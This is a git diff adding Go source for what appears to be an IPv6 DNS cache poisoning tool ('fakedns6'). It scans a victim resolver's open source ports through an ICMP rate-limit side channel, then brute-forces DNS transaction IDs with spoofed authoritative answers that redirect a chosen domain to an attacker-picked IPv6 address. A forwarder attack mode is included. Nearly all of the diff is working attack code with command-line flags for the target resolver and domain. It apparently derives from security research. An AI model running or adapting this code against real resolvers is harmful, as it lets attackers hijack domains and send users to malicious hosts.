+ } else {
+ fmt.Println("newrtt error:", newrtt)
+ }
+ //reduce ratelimit counter
+ localIPNum := getLocalIPNum(nestedIp.SrcIP)
+ if localIPNum != -1 {
+ if r.perIPLimitCounter[localIPNum] >= 0 {
+ r.perIPLimitCounter[localIPNum]--
+ }
+ if r.perIPLimitCounter[localIPNum] < 0 {
+ if debugOutput {
+ /* This may happen in real attacks. Don't panic :). */
+ fmt.Println(r.resolverBackendIP, "bug: perIPLimitCounter < 0")
+ }
+ }
+ if debugOutput {
+ fmt.Println(r.resolverBackendIP, "remaining counter:", localIPNum, r.perIPLimitCounter[localIPNum])
+ }
+ } else {
+ if debugOutput {
+ fmt.Println("received unwanted ICMP for", nestedIp.SrcIP)
+ }
+ }
+ //process the packet
+ binarySearch(r, nestedIp.FlowLabel)
+ }
+ /* This is used to terminate TxID brute forcing earlier if we found the port is indeed not open (i.e., false positive) to avoid wasting time.
+ * Check related code to see if this really works before uncommenting this.
+ * This may not be useful since brute force only takes ~800ms, which is fairly short.
+ * To uncomment this, make clear which backend resolver sent the message so that resolvers won't interfere with each other */
+ //else if nestedIp.Id == 2 {
+ // //got verification packet for DNS brute forcing
+ // bruteForceShouldBeKilled = false
+ //}
+ }
+ }
+ }
+}
+
+func binarySearch(r *backendResolver, flowlabel uint32) {
+ groupLen := 0
+ group := r.groups[flowlabel]
+
+ for _, port := range group {
+ if port != 65535 {
+ groupLen++
+ } else {
+ break
+ }
+ }
+
+ if groupLen == 1 {
+ //brute force
+ r.networkXmitLock.Lock()
+ dnsBruteForce(group[0], timeGap, r.resolverBackendIP, auxiliaryDomain)
+ r.networkXmitLock.Unlock()
+ r.alwaysOpenPorts[group[0]] = true
+ } else if groupLen > 1 {
+ var repeatTimes1 int
+ if repeatTimes > 1 {
+ repeatTimes1 = repeatTimes + 1
+ } else {
+ repeatTimes1 = 1
+ }
+ for j := 0; j < repeatTimes1; j++ {
+ //left
+ id := allocateGroupID(r)
+ r.groups[id] = make([]uint16, groupLen/2)
+ copy(r.groups[id], group[0:groupLen/2])
+ for len(r.groups[id]) < GROUP_SIZE {
+ r.groups[id] = append(r.groups[id], 65535)
+ }
+ if debugOutput {
+ fmt.Println(r.resolverBackendIP, "bs", r.groups[id][0], "+", groupLen/2)
+ } else {
+ fmt.Println("Found something interesting!")
+ }
+ r.priorityProbeChannel <- flowlabel
+
+ //right
+ id = allocateGroupID(r)
+ r.groups[id] = make([]uint16, groupLen-groupLen/2)
+ copy(r.groups[id], group[groupLen/2:groupLen])
+ for len(r.groups[id]) < GROUP_SIZE {
+ r.groups[id] = append(r.groups[id], 65535)
+ }
+ //fmt.Println(r.resolverBackendIP, "bsr", r.groups[id][0], "+", groupLen-groupLen/2)
+ r.priorityProbeChannel <- flowlabel
+ }
+ } else {
+ if debugOutput {
+ fmt.Println(r.resolverBackendIP, "bug: groupLen <= 0, id=", flowlabel)
+ for _, port := range group {
+ fmt.Print(port)
+ }
+ }
+ }
+}
+
+func perIPLimitRecover(r *backendResolver, num int) {
+ for {
+ if r.perIPLimitCounter[num] < 6 {
+ time.Sleep(time.Second + (time.Duration(defaultJitter)+50)*time.Millisecond)
+ r.perIPLimitCounter[num]++
+ } else {
+ time.Sleep((time.Duration(defaultJitter) + 1) * time.Millisecond)
+ }
+ }
+}
+
+func probeSender(r *backendResolver) {
+ for {
+
+ var id uint32
+ select {
+ case id = <-r.priorityProbeChannel:
+ break
+ case id = <-r.probeChannel:
+ break
+ //default:
+ // time.Sleep(time.Microsecond)
+ }
+
+ /* in favor of brute force when there is no per ip permit and there is only one port in group */
+ if getIPwithAvailableCounter(r) == nil && r.groups[id][1] == 65535 {
+ //brute force
+ r.networkXmitLock.Lock()
+ dnsBruteForce(r.groups[id][0], timeGap, r.resolverBackendIP, auxiliaryDomain)
+ r.networkXmitLock.Unlock()
+ r.alwaysOpenPorts[r.groups[id][0]] = true
+ continue
+ }
+ //test per ip rate limit
+ var verifyIP net.IP
+ for {
+ verifyIP = getIPwithAvailableCounter(r)
+ if verifyIP == nil {
+ time.Sleep(time.Millisecond)
+ } else {
+ break
+ }
+ }
+
+ //send
+ ports := r.groups[id]
+ r.networkXmitLock.Lock()
+ for i := 0; i < GROUP_SIZE; i++ {
+ if defaultJitter <= 3 {
+ if attackForwarder {
+ xmitUDPv6(authIP, r.resolverBackendIP, 53, layers.UDPPort(ports[i]), id, 100)
+ } else {
+ xmitUDPv6(authIP, r.resolverBackendIP, 53, layers.UDPPort(ports[i]), id, 1)
+ }
+ } else {
+ xmitUDPv6(authIP, r.resolverBackendIP, 53, layers.UDPPort(ports[i]), id, 0)
+ }
+ }
+ time.Sleep(time.Duration(defaultJitter) * time.Millisecond)
+ //verify
+ xmitUDPv6(verifyIP, r.resolverBackendIP, 53, 65535, id, 10)
+ r.groupSendTime[id] = time.Now()
+ if rand.Uint32()%100 < 2 {
+ if debugOutput {
+ fmt.Println(r.resolverBackendIP, "probing", ports[0])
+ } else {
+ fmt.Println("Continue attacking...")
+ }
+ }
+
+ //recover global counter
+ if !attackForwarder {
+ time.Sleep(time.Duration(60-defaultJitter) * time.Millisecond)
+ } else {
+ /* IDK why I wrote this line. Forwarders should be the same as resolvers if they support global rate limit. */
+ time.Sleep(time.Duration(60) * time.Millisecond)
+ }
+ r.networkXmitLock.Unlock()
+ }
+}
+
+func portGroupFormer(r *backendResolver, startPort uint, endPort uint) {
+ for {
+ //divide into groups
+ var id uint32 = 0
+ var currentGroupSize = 0
+
+ for i := startPort; i <= endPort; i++ {
+ /* It's unlikely the port is reused for further queries. But it's still possible. Uncomment here if you feed like port reusing is unlikely to happen. */
+ //if r.alwaysOpenPorts[i] {
+ // continue
+ //}
+ if currentGroupSize%GROUP_SIZE == 0 {
+ if id != 0 {
+ r.probeChannel <- id
+ for j := 1; j < repeatTimes; j++ {
+ //dup
+ previd := id
+ id = allocateGroupID(r)
+ r.groups[id] = make([]uint16, len(r.groups[previd]))
+ copy(r.groups[id], r.groups[previd])
+ r.probeChannel <- id
+ }
+ }
+
+ id = allocateGroupID(r)
+ r.groups[id] = make([]uint16, 0)
+ }
+
+ r.groups[id] = append(r.groups[id], uint16(i))
+ currentGroupSize++
+ }
+
+ //deal with last several cases
+ if /*len(r.groups[id]) != 50 &&*/ len(r.groups[id]) != 0 {
+ for len(r.groups[id]) != 50 && len(r.groups[id]) != 0 {
+ r.groups[id] = append(r.groups[id], 65535)
+ }
+
+ r.probeChannel <- id
+
+ for j := 1; j < repeatTimes; j++ {
+ //dup
+ previd := id
+ id = allocateGroupID(r)
+ r.groups[id] = make([]uint16, len(r.groups[previd]))
+ copy(r.groups[id], r.groups[previd])
+ r.probeChannel <- id
+ }
+ }
+ }
+}
+
+func main() {
+
+ /* This program only finds & injects DNS responses automatically. Additional authoritative server muting/flooding scripts are needed. */
+ /* IPv6 is not supported yet. */
+ /* Use "-h to get usage. " */
+ /* Author: Keyu Man ([email protected]) */
+ /* Attaching PoC? */
+ /* Add Paper Bio? */
+ ifaceName := flag.String("i", "vmnet1", "Interface for attacking. Multiple interfaces are not supported. Multiple IPs per interface is supported.")
+ /* If automatic MAC address discovery doesn't work. consider enable this option and feed it to the MAC field. */
+ // gateWayMacStr := flag.String("g", "00:11:22:33:44:55", "Gateway Mac")
+ authServer := flag.String("a", "", "Authoritative server for the domain to be poisoned.")
+ resolver := flag.String("r", "8.8.8.8", "Front-end IP of the victim resolver.")
+ resolverBackend := flag.String("b", "", "Back-end IP of the victim resolver.")
+ resolverBackendList := flag.String("bn", "", "Back-end IP list of the victim resolver. One per line. This would overwrite \"-b\" and is used when the server has multiple backend IPs.")
+ startPort := flag.Uint("s", 1, "Lowest port # for the port scan range, inclusive.")
+ endPort := flag.Uint("e", 65534, "Highest port # for the port scan range, inclusive.")
+ victimDNSName := flag.String("n", "", "The domain name to be poisoned.")
+ dnsQueryTmeout := flag.Uint("t", 4000, "Timeout in ms for outgoing dns queries to the victim resolver. Should be aligned with the resolver's timeout (e.g., BIND is 10000ms by default).")
+ defaultJitter := flag.Uint("j", 5, "Time gap between verification packet and the latest probe packet in a group. Increase the value if Jitter is increased.")
+ repeatTimes := flag.Uint("R", 1, "Retransmit/Reprobe a group of ports for X times to reduce FNs.")
+ timeGap := flag.Uint("tg", 0, "Time gap is us(microseconds) between the TxID brute force packets.")
+ //auxiliaryDomain := flag.String("ad", "", "Attacker-controlled domain used to host the fake NS for the victim domain and to store the fake AAAA record of the victim domain.")
+ attackertarget := flag.String("at", "", "攻击者想要更改到的IPv6地址")
+ debugOutput := flag.Bool("d", false, "Debug output mode.")
+ attackerMaliciousDomain := flag.String("af", "", "Attacker controlled domain used in the forwarder attack, this will enable the forwarder attack mode.")
+ soaName := flag.String("soa", "", "SOA name of the victim domain on attacker-controlled name server used to indicate the resolver has been poisoned. (Resolver attack only.)")
+
+ //特殊用途
+ isfake := flag.Int("f", 0, "")
+ flag.Parse()
+ //gatewayMac, _ := net.ParseMAC(*gateWayMacStr)
+ Main(*ifaceName, net.ParseIP(*authServer), net.ParseIP(*resolver), net.ParseIP(*resolverBackend), *startPort, *endPort, *victimDNSName, *dnsQueryTmeout, *defaultJitter,
+ *attackerMaliciousDomain, *resolverBackendList, *debugOutput, *repeatTimes, *timeGap, *attackertarget, *soaName, *isfake)
+ os.Exit(0)
+}
+
+func Main(ifaceName string, authIPArg net.IP, resolverIPArg net.IP, resolverBackendIPArg net.IP, startPort uint, endPort uint, victimDNSNameArg string, dnsQueryTimeout uint,
+ defaultJitterArg uint, attackerMaliciousDomainArg string, resolverBackendList string, debugOutputArg bool, repeatTimesArg uint, timeGapArg uint, attackertargetIP string,
+ soaNameArg string, isfake int) {
+ fmt.Println("/***Please make sure to fill every argument carefully and correct. Otherwise the program will crash.***/")
+ // 特殊用途
+ if isfake == 1 {
+ c := new(dns.Client)
+ msg := new(dns.Msg)
+ if strings.Contains(attackertargetIP, ":") { // attackertargetIP -- 攻击者要更改到的IPv6地址
+ println("目标:" + resolverBackendIPArg.String()) // resolverBackendIPArg -- Back-end IP of the victim resolver
+ ipcode := strings.ReplaceAll(attackertargetIP, ":", "-")
+ if victimDNSNameArg[len(victimDNSNameArg)-1:] != "." { // victimDNSNameArg -- The domain name to be poisoned
+ victimDNSNameArg = victimDNSNameArg + "."
+ }
+ domain := ipcode + "." + victimDNSNameArg
+
+ fmt.Println("查询的目标域名:" + domain)
+
+ msg.SetQuestion(domain, dns.TypeAAAA)
+ _, _, _ = c.Exchange(msg, net.JoinHostPort(resolverBackendIPArg.String(), "53"))
+ return
+ } else {
+ println(attackertargetIP)
+ println(victimDNSNameArg)
+ println("参数有误,请输入IPv6地址作为篡改目标结果")
+ }
+ } else {
+ c := new(dns.Client)
+ msg := new(dns.Msg)
+ // domain := "www.google.com."
+ // msg.SetQuestion(domain, dns.TypeAAAA)
+ // for i := 0; i < 10000; i++ {
+ // go func() {
+ // _, _, _ = c.Exchange(msg, net.JoinHostPort("8.8.8.8", "53"))
+ // }()
+ // }
+ domain := "daffteg." + victimDNSNameArg
+ msg.SetQuestion(domain, dns.TypeAAAA)
+ _, _, _ = c.Exchange(msg, net.JoinHostPort(resolverBackendIPArg.String(), "53"))
+ return
+ }
+
+ rand.Seed(time.Now().UnixNano())
+ handle, _ = pcap.OpenLive(
+ ifaceName,
+ 65536,
+ true,
+ pcap.BlockForever,
+ )
+ println(authIPArg.To16().String())
+ err := handle.SetBPFFilter("not host " + authIPArg.To16().String())
+ if err != nil {
+ fmt.Println("cannot set BPF filter.")
+ }
+ iface, err := net.InterfaceByName(ifaceName)
+ if err != nil {
+ fmt.Println("cannot open network interface")
+ os.Exit(1)
+ }
+
+ if attackerMaliciousDomainArg != "" {
+ attackForwarder = true
+ fmt.Println("Forwarder Attack Mode!")
+ attackerControlledDomain = attackerMaliciousDomainArg
+ }
+
+ authIP = authIPArg
+ resolverIP = resolverIPArg
+ victimDNSName = victimDNSNameArg
+ debugOutput = debugOutputArg
+ timeGap = timeGapArg
+ soaName = soaNameArg
+
+ localIP, _ = GetIfaceAddrMulti(iface)
+ nonce := strconv.Itoa(rand.Int())
+
+ if !attackForwarder {
+ dnsQueryName = nonce + "." + victimDNSName
+ } else {
+ dnsQueryName = nonce + "." + attackerControlledDomain
+ }
+
+ defaultJitter = defaultJitterArg
+ repeatTimes = int(repeatTimesArg)
+
+ if resolverBackendList != "" {
+ file, err := os.Open(resolverBackendList)
+ if err != nil {
+ fmt.Println(err)
+ os.Exit(10)
+ }
+ for {
+ var resolverIP string
+ n, err := fmt.Fscanf(file, "%s", &resolverIP)
+ if n <= 0 || err != nil {
+ break
+ }
+ backendResolvers = append(backendResolvers, backendResolverBuilder(net.ParseIP(resolverIP)))
+ }
+ } else {
+ //r1 shouldn't be nil
+ r1 := backendResolverBuilder(resolverBackendIPArg)
+ backendResolvers = append(backendResolvers, r1)
+ }
+
+ //figure out MAC address
+ //test if it's in LAN first
+ dstMac, err := GetGatewayAddr(iface, handle, backendResolvers[0].resolverBackendIP.To16())
+ if err == nil {
+ ethernetLayer = &layers.Ethernet{
+ SrcMAC: iface.HardwareAddr,
+ DstMAC: dstMac,
+ //EthernetType: layers.EthernetTypeIPv4,
+ EthernetType: layers.EthernetTypeIPv6,
+ }
+ fmt.Println("Mac:", dstMac)
+ } else {
+ //query routing table
+ router, err := routing.New()
+ if err != nil {
+ fmt.Println(err)
+ os.Exit(4)
+ }
+ _, nextHopIP, _, err := router.Route(backendResolvers[0].resolverBackendIP)
+ if err != nil {
+ fmt.Println(err)
+ os.Exit(5)
+ }
+ dstMac, err := GetGatewayAddr(iface, handle, nextHopIP.To16())
+ if err != nil {
+ fmt.Println(err)
+ os.Exit(6)
+ }
+ fmt.Println("MAC:", dstMac)
+ ethernetLayer = &layers.Ethernet{
+ SrcMAC: iface.HardwareAddr,
+ DstMAC: dstMac,
+ //EthernetType: layers.EthernetTypeIPv4,
+ EthernetType: layers.EthernetTypeIPv6,
+ }
+ }
+
+ go receivingThread()
+
+ for i, ip := range localIP {
+ if debugOutput {
+ fmt.Println("use IP", ip)
+ }
+ for _, r := range backendResolvers {
+ go perIPLimitRecover(r, i)
+ }
+ }
+ go dnsRequestSender(dnsQueryTimeout)
+
+ for _, r := range backendResolvers {
+ go probeSender(r)
+ go portGroupFormer(r, startPort, endPort)
+ time.Sleep(25 * time.Millisecond)
+ }
+
+ time.Sleep(999 * time.Hour)
+
+}
+
+func allocateGroupID(r *backendResolver) uint32 {
+ r.groupIDCounterLock.Lock()
+ id := r.groupIDCounter
+ r.groupIDCounter++
+ if r.groupIDCounter == 0 {
+ r.groupIDCounter = 3
+ }
+ r.groupIDCounterLock.Unlock()
+ return id
+}
+
+func getBackendResolver(resolverIP net.IP) *backendResolver {
+ for _, r := range backendResolvers {
+ if compareIPv6Addr(r.resolverBackendIP, resolverIP) == 0 {
+ return r
+ }
+ }
+ return nil
+}
+
+func lockNetwork() {
+ for _, r := range backendResolvers {
+ r.networkXmitLock.Lock()
+ }
+}
+
+func unlockNetwork() {
+ for _, r := range backendResolvers {
+ r.networkXmitLock.Unlock()
+ }
+}
+
+func getLocalIPNum(ip net.IP) int {
+ for i, localip := range localIP {
+ if compareIPv6Addr(localip, ip) == 0 {
+ return i
+ }
+ }
+ return -1
+}
+
+func backendResolverBuilder(backendIP net.IP) *backendResolver {
+
+ if backendIP == nil {
+ return nil
+ }
+ temp := backendResolver{
+ resolverBackendIP: backendIP,
+ groups: make([][]uint16, 65536),
+ groupIDCounter: 3,
+ groupIDCounterLock: &sync.Mutex{},
+ groupSendTime: make([]time.Time, 65536),
+ probeChannel: make(chan uint32, 655),
+ priorityProbeChannel: make(chan uint32, 655),
+ alwaysOpenPorts: make([]bool, 65536),
+ perIPLimitCounter: make([]int, len(localIP)),
+ networkXmitLock: &sync.Mutex{},
+ }
+ for i := range temp.perIPLimitCounter {
+ temp.perIPLimitCounter[i] = 6
+ }
+ for i := 0; i < 65536; i++ {
+ temp.alwaysOpenPorts[i] = false
+ }
+ temp.alwaysOpenPorts[53] = true
+ temp.alwaysOpenPorts[0] = true
+ temp.alwaysOpenPorts[65535] = true
+ return &temp
+
+}
+
+// distribute verification to multiple IPs evenly
+func getIPwithAvailableCounter(r *backendResolver) net.IP {
+ seed := rand.Int() % len(localIP)
+ for i := 0; i < len(localIP); i++ {
+ if r.perIPLimitCounter[(i+seed)%len(localIP)] > 0 {
+ return localIP[(i+seed)%len(localIP)]
+ }
+ }
+ return nil
+}
diff --git a/5_v6_fake/src/ucr.edu/fakedns6/dns.go b/5_v6_fake/src/ucr.edu/fakedns6/dns.go
new file mode 100644
index 0000000..5af9631
--- /dev/null
+++ b/5_v6_fake/src/ucr.edu/fakedns6/dns.go
@@ -0,0 +1,332 @@
+package main
+
+import (
+ "fmt"
+ "github.com/google/gopacket/layers"
+ "math/rand"
+ "net"
+ "time"
+)
+
+var bruteForceCouldBeKilled bool
+
+func sendDNSRequest(id uint16, name string) {
+ if debugOutput {
+ fmt.Println("Send new DNS request", name, id)
+ }
+ _sendDNSRequest(id, name, localIP[0], resolverIP, (layers.UDPPort)(rand.Uint32()), 53)
+}
+
+func _sendDNSRequest(id uint16, name string, src net.IP, dst net.IP, sport layers.UDPPort, dport layers.UDPPort) {
+ ipLayer := layers.IPv6{
+ FlowLabel: 1,
+ SrcIP: src,
+ DstIP: dst,
+ Version: 6,
+ HopLimit: 64,
+ NextHeader: layers.IPProtocolUDP,
+ //Flags: layers.IPv4DontFragment,
+ }
+ udpLayer := layers.UDP{
+ SrcPort: sport,
+ DstPort: dport,
+ }
+ dnsLayer := layers.DNS{
+ ID: id,
+ QR: false,
+ OpCode: 0,
+ AA: false,
+ TC: false,
+ RD: true,
+ RA: false,
+ Z: 0,
+ ResponseCode: 0,
+ QDCount: 1,
+ ANCount: 0,
+ NSCount: 0,
+ ARCount: 0,
+ Questions: []layers.DNSQuestion{{
+ Name: []byte(name),
+ Type: layers.DNSTypeAAAA,
+ Class: layers.DNSClassIN,
+ }},
+ Authorities: nil,
+ Additionals: nil,
+ }
+ err := udpLayer.SetNetworkLayerForChecksum(&ipLayer)
+ if err != nil {
+ fmt.Println("udpLayer.SetNetworkLayerForChecksum @ dns.go pos 0 error", err)
+ }
+ err = Send(handle, ethernetLayer, &ipLayer, &udpLayer, &dnsLayer)
+ if err != nil {
+ fmt.Println("can not send packet @ sendDNSRequest: ", err)
+ }
+}
+
+func bruteForceTerminatingTimer(timegap uint) {
+ time.Sleep(time.Duration(timegap) * time.Millisecond)
+ bruteForceCouldBeKilled = true
+}
+
+func dnsBruteForce(targetPort uint16, timegap uint, resolverBackendIP net.IP, auxDomain string) {
+ bruteForceShouldBeKilled = true
+ bruteForceCouldBeKilled = false
+ ipLayer := layers.IPv6{
+ FlowLabel: 2,
+ SrcIP: authIP,
+ DstIP: resolverBackendIP,
+ Version: 6,
+ HopLimit: 64,
+ NextHeader: layers.IPProtocolUDP,
+ //Flags: layers.IPv4DontFragment,
+ }
+ udpLayer := layers.UDP{
+ SrcPort: 53,
+ DstPort: layers.UDPPort(targetPort),
+ }
+ dnsLayer := layers.DNS{
+ ID: 0,
+ QR: true,
+ OpCode: 0,
+ AA: true,
+ TC: false,
+ RD: false,
+ RA: false,
+ Z: 0,
+ ResponseCode: layers.DNSResponseCodeNoErr,
+
+ /* Answers for A request for ns.a.com */
+ //Questions: []layers.DNSQuestion{{
+ // Name: []byte(victimAuthName),
+ // Type: layers.DNSTypeA,
+ // Class: layers.DNSClassIN,
+ //}},
+ //Answers: []layers.DNSResourceRecord{{
+ // Name: []byte(victimAuthName),
+ // Type: layers.DNSTypeA,
+ // Class: layers.DNSClassIN,
+ // TTL: 300,
+ // IP: net.ParseIP(""),
+ // CNAME: nil,
+ // PTR: nil,
+ // TXTs: nil,
+ // SOA: layers.DNSSOA{},
+ // SRV: layers.DNSSRV{},
+ // MX: layers.DNSMX{},
+ // OPT: nil,
+ // TXT: nil,
+ //}},
+ //Authorities: nil,
+ //Additionals: nil,
+
+ /* Answers for A request for www.a.com */
+ //Questions: []layers.DNSQuestion{{
+ // Name: []byte(victimDNSName),
+ // Type: layers.DNSTypeA,
+ // Class: layers.DNSClassIN,
+ //}},
+ //Answers: []layers.DNSResourceRecord{{
+ // Name: []byte(victimDNSName),
+ // Type: layers.DNSTypeA,
+ // Class: layers.DNSClassIN,
+ // TTL: 300,
+ // IP: net.ParseIP(""),
+ // CNAME: nil,
+ // PTR: nil,
+ // TXTs: nil,
+ // SOA: layers.DNSSOA{},
+ // SRV: layers.DNSSRV{},
+ // MX: layers.DNSMX{},
+ // OPT: nil,
+ // TXT: nil,
+ //}},
+ //Authorities: nil,
+ //Additionals: nil,
+
+ /* Answers for A request for ***.www.a.com */
+ //Questions: []layers.DNSQuestion{{
+ // Name: []byte(dnsQueryName),
+ // Type: layers.DNSTypeA,
+ // Class: layers.DNSClassIN,
+ //}},
+ //Authorities: []layers.DNSResourceRecord{{
+ // Name: []byte(victimDNSName),
+ // Type: layers.DNSTypeNS,
+ // Class: layers.DNSClassIN,
+ // TTL: 300,
+ // IP: nil,
+ // NS: []byte(auxDomain),
+ // CNAME: nil,
+ // PTR: nil,
+ // TXTs: nil,
+ // SOA: layers.DNSSOA{},
+ // SRV: layers.DNSSRV{},
+ // MX: layers.DNSMX{},
+ // OPT: nil,
+ // TXT: nil,
+ //}},
+ //Answers: nil,
+ //Additionals: nil,
+ }
+
+ if !attackForwarder {
+ dnsLayer.Questions = []layers.DNSQuestion{{
+ Name: []byte(dnsQueryName),
+ Type: layers.DNSTypeAAAA,
+ Class: layers.DNSClassIN,
+ }}
+ // 原方案:将域名NS篡改到attacker的服务器上
+ //dnsLayer.Authorities = []layers.DNSResourceRecord{{
+ // Name: []byte(victimDNSName),
+ // Type: layers.DNSTypeNS,
+ // Class: layers.DNSClassIN,
+ // TTL: 300,
+ // IP: nil,
+ // NS: []byte(auxDomain),
+ // CNAME: nil,
+ // PTR: nil,
+ // TXTs: nil,
+ // SOA: layers.DNSSOA{},
+ // SRV: layers.DNSSRV{},
+ // MX: layers.DNSMX{},
+ // OPT: nil,
+ // TXT: nil,
+ //}}
+ //dnsLayer.Answers = nil
+ //dnsLayer.Additionals = nil
+ dnsLayer.Authorities = []layers.DNSResourceRecord{{
+ Name: []byte(dnsQueryName),
+ Type: layers.DNSTypeNS,
+ Class: layers.DNSClassIN,
+ TTL: 300,
+ IP: nil,
+ NS: []byte(auxDomain),
+ CNAME: nil,
+ PTR: nil,
+ TXTs: nil,
+ SOA: layers.DNSSOA{},
+ SRV: layers.DNSSRV{},
+ MX: layers.DNSMX{},
+ OPT: nil,
+ TXT: nil,
+ }}
+ dnsLayer.Answers = []layers.DNSResourceRecord{{
+ Name: []byte(dnsQueryName),
+ Type: layers.DNSTypeAAAA,
+ Class: layers.DNSClassIN,
+ TTL: 300,
+ /* Fill with any IP you want. The victim domain will be hijacked to this IP. */
+ IP: net.ParseIP("2001::1234"),
+ NS: nil,
+ CNAME: nil,
+ PTR: nil,
+ TXTs: nil,
+ SOA: layers.DNSSOA{},
+ SRV: layers.DNSSRV{},
+ MX: layers.DNSMX{},
+ OPT: nil,
+ TXT: nil,
+ }}
+ dnsLayer.Additionals = nil
+ } else {
+ /* Change these flags accordingly to the request sent by the resolver. */
+ dnsLayer.AA = false
+ dnsLayer.RD = true
+ dnsLayer.RA = true
+ dnsLayer.Questions = []layers.DNSQuestion{{
+ Name: []byte(dnsQueryName),
+ Type: layers.DNSTypeAAAA,
+ Class: layers.DNSClassIN,
+ }}
+ dnsLayer.Answers = []layers.DNSResourceRecord{{
+ Name: []byte(dnsQueryName),
+ Type: layers.DNSTypeCNAME,
+ Class: layers.DNSClassIN,
+ TTL: 300,
+ IP: nil,
+ NS: nil,
+ CNAME: []byte(victimDNSName),
+ PTR: nil,
+ TXTs: nil,
+ SOA: layers.DNSSOA{},
+ SRV: layers.DNSSRV{},
+ MX: layers.DNSMX{},
+ OPT: nil,
+ TXT: nil,
+ }, {
+ Name: []byte(victimDNSName),
+ Type: layers.DNSTypeAAAA,
+ Class: layers.DNSClassIN,
+ TTL: 300,
+ /* Fill with any IP you want. The victim domain will be hijacked to this IP. */
+ IP: net.ParseIP("2001::1234"),
+ NS: nil,
+ CNAME: nil,
+ PTR: nil,
+ TXTs: nil,
+ SOA: layers.DNSSOA{},
+ SRV: layers.DNSSRV{},
+ MX: layers.DNSMX{},
+ OPT: nil,
+ TXT: nil,
+ }}
+ }
+
+ err := udpLayer.SetNetworkLayerForChecksum(&ipLayer)
+ if err != nil {
+ fmt.Println("udpLayer.SetNetworkLayerForChecksum @ dns.go error", err)
+ }
+ if debugOutput {
+ fmt.Println("DNS BruteForce: ", targetPort)
+ }
+
+ startTime := time.Now()
+ var txid uint16
+ //try to see if this port is open in reality
+ for txid = 0; txid < GROUP_SIZE*2; txid++ {
+ dnsLayer.ID = txid
+ err = Send(handle, ethernetLayer, &ipLayer, &udpLayer, &dnsLayer)
+ if err != nil {
+ fmt.Println("can not send packet @ sendDNSRequest pos 1: ", err)
+ }
+ time.Sleep(time.Duration(timegap) * time.Microsecond)
+ }
+
+ /* This is used for early termination */
+ //verification packet
+ //xmitUDPv6(localIP, resolverBackendIP, layers.UDPPort(targetPort), 65535, 2, 0)
+ //go bruteForceTerminatingTimer( /*jitter + defaultJitter*/ defaultJitter + 60)
+
+ //continue brute force
+ for txid = GROUP_SIZE * 2; txid < 0xffff; txid++ {
+ /* This is used for early termination */
+ //if bruteForceCouldBeKilled && bruteForceShouldBeKilled {
+ // fmt.Println("DNS Brute force aborted")
+ // break
+ //}
+ dnsLayer.ID = txid
+ err := Send(handle, ethernetLayer, &ipLayer, &udpLayer, &dnsLayer)
+ if err != nil {
+ fmt.Println("can not send packet @ DNSBruteForce: ", err)
+ }
+ if timegap != 0 {
+ time.Sleep(time.Duration(timegap) * time.Microsecond)
+ }
+ }
+
+ //0xffff is missing from packet trace
+ /* This is used for early termination */
+ //if !bruteForceShouldBeKilled {
+ dnsLayer.ID = 0xffff
+ err = Send(handle, ethernetLayer, &ipLayer, &udpLayer, &dnsLayer)
+ if err != nil {
+ fmt.Println("can not send packet @ DNSBruteForce pos 2: ", err)
+ }
+ //}
+ if debugOutput {
+ fmt.Println("time: ", time.Now().Sub(startTime))
+ }
+
+ //help to recover the global counter
+ time.Sleep(time.Duration(60+ /*jitter + defaultJitter*/ defaultJitter) * time.Millisecond)
+}
diff --git a/5_v6_fake/src/ucr.edu/fakedns6/go.mod b/5_v6_fake/src/ucr.edu/fakedns6/go.mod
new file mode 100644
index 0000000..30178cb
--- /dev/null
+++ b/5_v6_fake/src/ucr.edu/fakedns6/go.mod
@@ -0,0 +1,15 @@
+module fakedns6
+
+go 1.20
+
+require (
+ github.com/google/gopacket v1.1.19
+ github.com/miekg/dns v1.1.57
+)
+
+require (
+ golang.org/x/mod v0.12.0 // indirect
+ golang.org/x/net v0.17.0 // indirect
+ golang.org/x/sys v0.13.0 // indirect
+ golang.org/x/tools v0.13.0 // indirect
+)
diff --git a/5_v6_fake/src/ucr.edu/fakedns6/go.sum b/5_v6_fake/src/ucr.edu/fakedns6/go.sum
new file mode 100644
index 0000000..96ee687
--- /dev/null
+++ b/5_v6_fake/src/ucr.edu/fakedns6/go.sum
@@ -0,0 +1,25 @@
+github.com/google/gopacket v1.1.19 h1:ves8RnFZPGiFnTS0uPQStjwru6uO6h+nlr9j6fL7kF8=
+github.com/google/gopacket v1.1.19/go.mod h1:iJ8V8n6KS+z2U1A8pUwu8bW5SyEMkXJB8Yo/Vo+TKTo=
+github.com/miekg/dns v1.1.57 h1:Jzi7ApEIzwEPLHWRcafCN9LZSBbqQpxjt/wpgvg7wcM=
+github.com/miekg/dns v1.1.57/go.mod h1:uqRjCRUuEAA6qsOiJvDd+CFo/vW+y5WR6SNmHE55hZk=
+golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
+golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
+golang.org/x/lint v0.0.0-20200302205851-738671d3881b/go.mod h1:3xt1FjdF8hUf6vQPIChWIBhFzV8gjjsPE/fR3IyQdNY=
+golang.org/x/mod v0.1.1-0.20191105210325-c90efee705ee/go.mod h1:QqPTAvyqsEbceGzBzNggFXnrqF1CaUcvgkdR5Ot7KZg=
+golang.org/x/mod v0.12.0 h1:rmsUpXtvNzj340zd98LZ4KntptpfRHwpFOHG188oHXc=
+golang.org/x/mod v0.12.0/go.mod h1:iBbtSCu2XBx23ZKBPSOrRkjjQPZFPuis4dIYUhu/chs=
+golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
+golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
+golang.org/x/net v0.17.0 h1:pVaXccu2ozPjCXewfr1S7xza/zcXTity9cCdXQYSjIM=
+golang.org/x/net v0.17.0/go.mod h1:NxSsAGuq816PNPmqtQdLE42eU2Fs7NoRIZrHJAlaCOE=
+golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
+golang.org/x/sync v0.4.0 h1:zxkM55ReGkDlKSM+Fu41A+zmbZuaPVbGMzvvdUPznYQ=
